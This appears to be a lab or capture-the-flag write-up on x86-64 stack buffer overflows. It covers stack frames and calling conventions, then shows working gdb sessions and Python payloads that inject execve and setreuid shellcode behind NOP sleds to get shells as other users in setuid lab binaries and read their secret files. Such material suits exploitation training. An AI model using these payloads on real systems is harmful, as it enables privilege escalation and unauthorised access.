Documentation
Process Layout
When a program runs on a machine, the computer runs the program as a process. Current computer architecture allows multiple processes to be run concurrently(at the same time by a computer). While these processes may appear to run at the same time, the computer actually switches between the processes very quickly and makes it look like they are running at the same time. Switching between processes is called a context switch. Since each process may need different information to run(e.g. The current instruction to execute), the operating system has to keep track of all the information in a process. The memory in the process is organised sequentially and has the following layout:
- User stack contains the information required to run the program. This information would include the current program counter, saved registers and more information. The section after the user stack is unused memory and it is used in case the stack grows(downwards).
- Shared library regions are used to either statically/dynamically link libraries that are used by the program.
- The heap increases and decreases dynamically depending on whether a program dynamically assigns memory. Notice there is a section that is unassigned above the heap which is used in the event that the size of the heap increases.
- The program code and data stores the program executable and initialised variables.
x86-64 Procedures
A program would usually comprise of multiple functions and there needs to be a way of tracking which function has been called, and which data is passed from one function to another. The stack is a region of contiguous memory addresses and it is used to make it easy to transfer control and data between functions. The top of the stack is at the lowest memory address and the stack grows towards lower memory addresses. The most common operations of the stack are:
Pushing: used to add data onto the stack Popping: used to remove data from the stack
push var
This is the assembly instruction to push a value onto the stack. It does the following: - Uses var or value stored in memory location of var
- Decrements the stack pointer(known as
rsp
) by 8 - Writes above value to new location of
rsp
, which is now the top of the stack
pop var
This is an assembly instruction to read a value and pop it off the stack. It does the following: - Reads the value at the address given by the stack pointer
Stack Top(memory location 0x0)(rsp
points here)
- Increment the stack pointer by 8
- Store the value that was read from rsp
into var
Each compiled program may include multiple functions, where each function would need to store local variables, arguments passed to the function and more. To make this easy to manage, each function has its own separate stack frame, where each new stack frame is allocated when a function is called, and deallocated when the function is complete.
This is easily explained using an example. Look at the two functions:
int add(int a, int b){
int new = a + b;
return new;
}
int calc(int a, int b){
int final = add(a, b);
return final;
}
calc(4, 5)
Procedures Continued
The explanation assumes that the current point of execution is inside the calc function. In this case calc is known as the caller function and add is known as the callee function. The following presents the assembly code inside the calc function.
The add function is invoked using the call operand in assembly, in this case callq sym.add. The call operand can either take a label as an argument(e.g. A function name), or it can take a memory address as an offset to the location of the start of the function in the form of call *value. Once the add function is invoked(and after it is completed), the program would need to know what point to continue in the program. To do this, the computer pushes the address of the next instruction onto the stack, in this case the address of the instruction on the line that contains movl %eax, local_4h. After this, the program would allocate a stack frame for the new function, change the current instruction pointer to the first instruction in the function, change the stack pointer(rsp) to the top of the stack, and change the frame pointer(rbp) to point to the start of the new frame.
Once the function is finished executing, it will call the return instruction(retq). This instruction will pop the value of the return address of the stack, deallocate the stack frame for the add function, change the instruction pointer to the value of the return address, change the stack pointer(rsp) to the top of the stack and change the frame pointer(rbp) to the stack frame of calc.
Now that we’ve understood how control is transferred through functions, let’s look at how data is transferred.
In the above example, we save that functions take arguments. The calc function takes 2 arguments(a and b). Upto 6 arguments for functions can be stored in the following registers: - rdi - rsi - rdx - rcx - r8 - r9
Note: rax is a special register that stores the return values of the functions(if any).
If a function has anymore arguments, these arguments would be stored on the functions stack frame.
We can now see that a caller function may save values in their registers, but what happens if a callee function also wants to save values in the registers? To ensure the values are not overwritten, the callee values first save the values of the registers on their stack frame, use the registers and then load the values back into the registers. The caller function can also save values on the caller function frame to prevent the values from being overwritten. Here are some rules around which registers are caller and callee saved:
- rax is caller saved
- rdi, rsi, rdx, rcx r8 and r9 are called saved(and they are usually arguments for functions)
- r10, r11 are caller saved
- rbx, r12, r13, r14 are callee saved
- rbp is also callee saved(and can be optionally used as a frame pointer)
- rsp is callee saved
So far, this is a more thorough example of the run time stack:
Endianess
In the above programs, you can see that the binary information is represented in hexadecimal format. Different architectures actually represent the same hexadecimal number in different ways, and this is what is referred to as Endianess. Let’s take the value of 0x12345678 as an example. Here the least significant value is the right most value(78) while the most significant value is the left most value(12).
Little Endian is where the value is arranged from the least significant byte to the most significant byte:
Big Endian is where the value is arranged from the most significant byte to the least significant byte.
Here, each “value” requires at least a byte to represent, as part of a multi-byte object.
Overwriting Variables
Now that we’ve looked at all the background information, let’s explore how the overflows actually work. If you take a look at the overflow-1 folder, you’ll notice some C code with a binary program. Your goal is to change the value of the integer variable.
From the C code you can see that the integer variable and character buffer have been allocated next to each other - since memory is allocated in contiguous bytes, you can assume that the integer variable and character buffer are allocated next to each other.
Note: this may not always be the case. With how the compiler and stack are configured, when variables are allocated, they would need to be aligned to particular size boundaries(e.g. 8 bytes, 16 byte) to make it easier for memory allocation/deallocation. So if a 12 byte array is allocated where the stack is aligned for 16 bytes this is what the memory would look like:
The compiler would automatically add 4 bytes to ensure that the size of the variable aligns with the stack size. From the image of the stack above, we can assume that the stack frame for the main function looks like this:
Even though the stack grows downwards, when data is copied/written into the buffer, it is copied from lower to higher addresess. Depending on how data is entered into the buffer, it means that it's possible to overwrite the integer variable. From the C code, you can see that the gets function is used to enter data into the buffer from standard input. The gets function is dangerous because it doesn't really have a length check - This would mean that you can enter more than 14 bytes of data, which would then overwrite the integer variable.
Try run the C program in this folder to overwrite the above variable!
Because the buffer has a size of 14
. We can exploit the vulnerability with:
python -c "print('a' * 14 + 'toto')" | ./program
Overwriting Function Pointers
For this example, look at the overflow- 2 folder. Inside this folder, you’ll notice the following C code.
To begin, we run the program through gdb
, we can see that with 15 * A
the return address is overwritten with one 41
wich corresponds to one A
:
[user1@ip-10-10-50-167 overflow-2]$ gdb func-pointer
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from func-pointer...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-2/func-pointer
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
AAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
Then, by entering 20*A
we can see that the return address is filled with several 41
. We can't add more A
because by adding one more, we are overwriting too far.
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer
AAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer
AAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x00000000004005da in main ()
(gdb) print special
$1 = {<text variable, no debug info>} 0x400567 <special>
Finally we add the address of the special function after the 14
a.
[user1@ip-10-10-50-167 overflow-2]$ python -c "print('a' * 14 + '\x67\x05\x40')" | ./func-pointer
this is the special function
you did this, friend!
Buffer Overflows
For this example, look at overflow-3 folder. Inside this folder, you’ll find the following C code.
This example will cover some of the more interesting, and useful things you can do with a buffer overflow. In the previous examples, we’ve seen that when a program takes users controlled input, it may not check the length, and thus a malicious user could overwrite values and actually change variables.
In this example, in the copy_arg function we can see that the strcpy function is copying input from a string(which is argv[1]
which is a command line argument) to a buffer of length 140 bytes. With the nature of strcpy, it does not check the length of the data being input so here it’s also possible to overflow the buffer - we can do something more malicious here.
Let’s take a look at what the stack will look like for the copy_arg function(this stack excludes the stack frame for the strcpy function):
Earlier, we saw that when a function(in this case main) calls another function(in this case copy_args), it needs to add the return address on the stack so the callee function(copy_args) knows where to transfer control to once it has finished executing. From the stack above, we know that data will be copied upwards from buffer[0]
to buffer[140]
. Since we can overflow the buffer, it also follows that we can overflow the return address with our own value. We can control where the function returns and change the flow of execution of a program(very cool, right?)
Know that we know we can control the flow of execution by directing the return address to some memory address, how do we actually do something useful with this. This is where shellcode comes in; shell code quite literally is code that will open up a shell. More specifically, it is binary instructions that can be executed. Since shellcode is just machine code(in the form of binary instructions), you can usually start of by writing a C program to do what you want, compile it into assembly and extract the hex characters(alternatively it would involve writing your own assembly). For now we’ll use this shellcode that opens up a basic shell:
\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05
So why don’t we looking at actually executing this shellcode. The basic idea is that we need to point the overwritten return address to the shellcode, but where do we actually store the shellcode and what actual address do we point it at? Why don’t we store the shellcode in the buffer - because we know the address at the beginning of the buffer, we can just overwrite the return address to point to the start of the buffer. Here’s the general process so far:
- Find out the address of the start of the buffer and the start address of the return address
- Calculate the difference between these addresses so you know how much data to enter to overflow
- Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
In theory, this looks like it would work quite well. However, memory addresses may not be the same on different systems, even across the same computer when the program is recompiled. So we can make this more flexible using a NOP instruction. A NOP instruction is a no operation instruction - when the system processes this instruction, it does nothing, and carries on execution. A NOP instruction is represented using \x90. Putting NOPs as part of the payload means an attacker can jump anywhere in the memory region that includes a NOP and eventually reach the intended instructions. This is what an injection vector would look like:
You’ve probably noticed that shellcode, memory addresses and NOP sleds are usually in hex code. To make it easy to pass the payload to an input program, you can use python:
python -c "print('\x90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + '\x41' * 60 + '\x60\x20\xa2\xf7\xff\x7f') | ./program_name"
Firstly, we have to found the number of characters to pass in order to overflow the return address:
[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
We can see that with 153 * A
we can overflow the return address.
Now, we determine the maximum size of the payload:
[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400563 in copy_arg ()
With 159 * A
we are gone too far. So the maximum size is 158
.
So let's craft a payload:
[user1@ip-10-10-144-140 overflow-3]$ python
Python 2.7.16 (default, Jul 19 2019, 23:05:17)
[GCC 7.3.1 20180712 (Red Hat 7.3.1-6)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode = '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'
>>> len(shellcode)
30
>>> payload = '\x90' * 90 + shellcode + 'A' * 32 + 'B' * 6
>>> len(payload)
158
The memory address has a size of 6
character so we used 6 * B
in order to recognize them on the return address:
(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
That's a success ! So now, we need to find the address of the shellcode. To do so we will print the memory where the shellcode is located. We defined the units of memory to print to 100
and we point to rsp - 158
because rsp
contains the stack pointer and we know that the payload has a size of 158
. The memory printed should begin with NOPs:
(gdb) x/100x $rsp-158
0x7fffffffe252: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe262: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe272: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe282: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe292: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a2: 0x90909090 0x90909090 0x622fb948 0x732f6e69
0x7fffffffe2b2: 0xc1481168 0xc14808e1 0x485108e9 0x48243c8d
0x7fffffffe2c2: 0x3bb0d231 0x4141050f 0x41414141 0x41414141
0x7fffffffe2d2: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2e2: 0x41414141 0x42424141 0x42424242 0xe3e80000
0x7fffffffe2f2: 0x7fffffff 0x00000000 0x00020000 0x05a00000
0x7fffffffe302: 0x00000040 0x302a0000 0x7ffff7a4 0x00000000
0x7fffffffe312: 0x00000000 0xe3e80000 0x7fffffff 0x00000000
0x7fffffffe322: 0x00020004 0x05640000 0x00000040 0x00000000
0x7fffffffe332: 0x00000000 0x41590000 0x81598c13 0x045071f6
0x7fffffffe342: 0x00000040 0xe3e00000 0x7fffffff 0x00000000
0x7fffffffe352: 0x00000000 0x00000000 0x00000000 0x41590000
0x7fffffffe362: 0x7e264173 0x41598e09 0x6e91d897 0x00008e09
0x7fffffffe372: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe382: 0x00000000 0xe4000000 0x7fffffff 0xe1300000
0x7fffffffe392: 0x7ffff7ff 0x76560000 0x7ffff7de 0x00000000
0x7fffffffe3a2: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3b2: 0x00000000 0x04500000 0x00000040 0xe3e00000
0x7fffffffe3c2: 0x7fffffff 0x047a0000 0x00000040 0xe3d80000
0x7fffffffe3d2: 0x7fffffff 0xdf800000 0x7ffff7ff 0x00020000
As you can see, the shellcode begins between 0x7fffffffe292
and 0x7fffffffe292
. So to be sure of the address, we realign the pointer.
(gdb) x/100x $rsp-160
0x7fffffffe248: 0xffffe648 0x00007fff 0x90909090 0x90909090
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a8: 0xb9489090 0x6e69622f 0x1168732f 0x08e1c148
0x7fffffffe2b8: 0x08e9c148 0x3c8d4851 0xd2314824 0x050f3bb0
0x7fffffffe2c8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2d8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2e8: 0xffffe2a8 0x007fff66 0xffffe3e8 0x00007fff
0x7fffffffe2f8: 0x00000000 0x00000002 0x004005a0 0x00000000
0x7fffffffe308: 0xf7a4302a 0x00007fff 0x00000000 0x00000000
0x7fffffffe318: 0xffffe3e8 0x00007fff 0x00040000 0x00000002
0x7fffffffe328: 0x00400564 0x00000000 0x00000000 0x00000000
0x7fffffffe338: 0xf7bfdd97 0x25c4f6f9 0x00400450 0x00000000
0x7fffffffe348: 0xffffe3e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe358: 0x00000000 0x00000000 0x3adfdd97 0xda3b0986
0x7fffffffe368: 0xa33bdd97 0xda3b1931 0x00000000 0x00000000
0x7fffffffe378: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe388: 0xffffe400 0x00007fff 0xf7ffe130 0x00007fff
0x7fffffffe398: 0xf7de7656 0x00007fff 0x00000000 0x00000000
0x7fffffffe3a8: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3b8: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe3c8: 0x0040047a 0x00000000 0xffffe3d8 0x00007fff
We can add the 0x7fffffffe298
at the end of our payload:
(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe2c8 in ?? ()
After many failed attempts, I've found a shellcode here.
So let's update the payload, and this works:
(gdb) run $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAAAAA�����
process 5242 is executing new program: /usr/bin/bash
sh-4.2$ id
Detaching after fork from child process 5246.
uid=1001(user1) gid=1001(user1) groups=1001(user1)
sh-4.2$ ls -la
Detaching after fork from child process 5247.
total 20
drwxrwxr-x 2 user1 user1 72 Sep 2 2019 .
drwx------ 7 user1 user1 169 Nov 27 2019 ..
-rwsrwxr-x 1 user2 user2 8264 Sep 2 2019 buffer-overflow
-rw-rw-r-- 1 user1 user1 285 Sep 2 2019 buffer-overflow.c
-rw------- 1 user2 user2 22 Sep 2 2019 secret.txt
sh-4.2$ cat secret.txt
Detaching after fork from child process 5248.
cat: secret.txt: Permission denied
But we have a permission denied...
So let's use pwntools
in order to craft a shell code who sets reuid
to 1002
(the id of user2
):
root@bastion:~# pwn shellcraft -f d amd64.linux.setreuid 1002
\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05
>>> payload = '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05'
>>> len(payload)
14
We add the shellcode and update the number of random chars in consequences:
[user1@ip-10-10-144-140 overflow-3]$ ./buffer-overflow $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 8 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAA�����
sh-4.2$ id
uid=1002(user2) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt
omgyoudidthissocool!!
Buffer Overflows 2
Try to use your newly learnt buffer overflow techniques for this binary file:
#include <stdio.h>
#include <stdlib.h>
void concat_arg(char *string)
{
char buffer[154] = "doggo";
strcat(buffer, string);
printf("new word is %s\n", buffer);
return 0;
}
int main(int argc, char **argv)
{
concat_arg(argv[1]);
}
Firstly, we found that the return address started to be overwritten from the 164th character until the 169th.
(gdb) run $(python -c "print('A' * 164)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 164)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
(gdb) run $(python -c "print('A' * 169)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 169)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
So let's craft a payload like previously and adapt it to this binary:
(gdb) run $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAABBBBBB
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
The retrun address is overwritten so we just need to replace the B * 6
with the memory address where the shellcode starts:
(gdb) x/100x $rsp-164
0x7fffffffe23c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe24c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe25c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe26c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe27c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe28c: 0x31909090 0xeabf66ff 0x58716a03 0x0ffe8948
0x7fffffffe29c: 0x583b6a05 0x49d23148 0x622f2fb8 0x732f6e69
0x7fffffffe2ac: 0xe8c14968 0x48504108 0x5752e789 0x0fe68948
0x7fffffffe2bc: 0x583c6a05 0x0fff3148 0x41414105 0x41414141
0x7fffffffe2cc: 0x41414141 0x41414141 0x41414141 0x42424242
0x7fffffffe2dc: 0x00004242 0xffffe3d8 0x00007fff 0x00000000
0x7fffffffe2ec: 0x00000002 0x004005e0 0x00000000 0xf7a4302a
0x7fffffffe2fc: 0x00007fff 0x00000000 0x00000000 0xffffe3d8
0x7fffffffe30c: 0x00007fff 0x00040000 0x00000002 0x004005ac
0x7fffffffe31c: 0x00000000 0x00000000 0x00000000 0xa5ce3cc0
0x7fffffffe32c: 0xe848714a 0x00400450 0x00000000 0xffffe3d0
0x7fffffffe33c: 0x00007fff 0x00000000 0x00000000 0x00000000
0x7fffffffe34c: 0x00000000 0x680e3cc0 0x17b78e35 0xf1ca3cc0
0x7fffffffe35c: 0x17b79e82 0x00000000 0x00000000 0x00000000
0x7fffffffe36c: 0x00000000 0x00000000 0x00000000 0xffffe3f0
0x7fffffffe37c: 0x00007fff 0xf7ffe130 0x00007fff 0xf7de7656
0x7fffffffe38c: 0x00007fff 0x00000000 0x00000000 0x00000000
0x7fffffffe39c: 0x00000000 0x00000000 0x00000000 0x00400450
0x7fffffffe3ac: 0x00000000 0xffffe3d0 0x00007fff 0x0040047a
0x7fffffffe3bc: 0x00000000 0xffffe3c8 0x00007fff 0xf7ffdf80
We can add the 0x7fffffffe28c
address at the end of our payload:
[user1@ip-10-10-64-110 overflow-4]$ ./buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + '\x8c\xe2\xff\xff\xff\x7f')")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAA�����
sh-4.2$ id
uid=1003(user3) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt
wowanothertime!!
You can note that the setreuid
shell code have a little bit changed because the owner of secret.txt
is user3
so the uid is 1003
.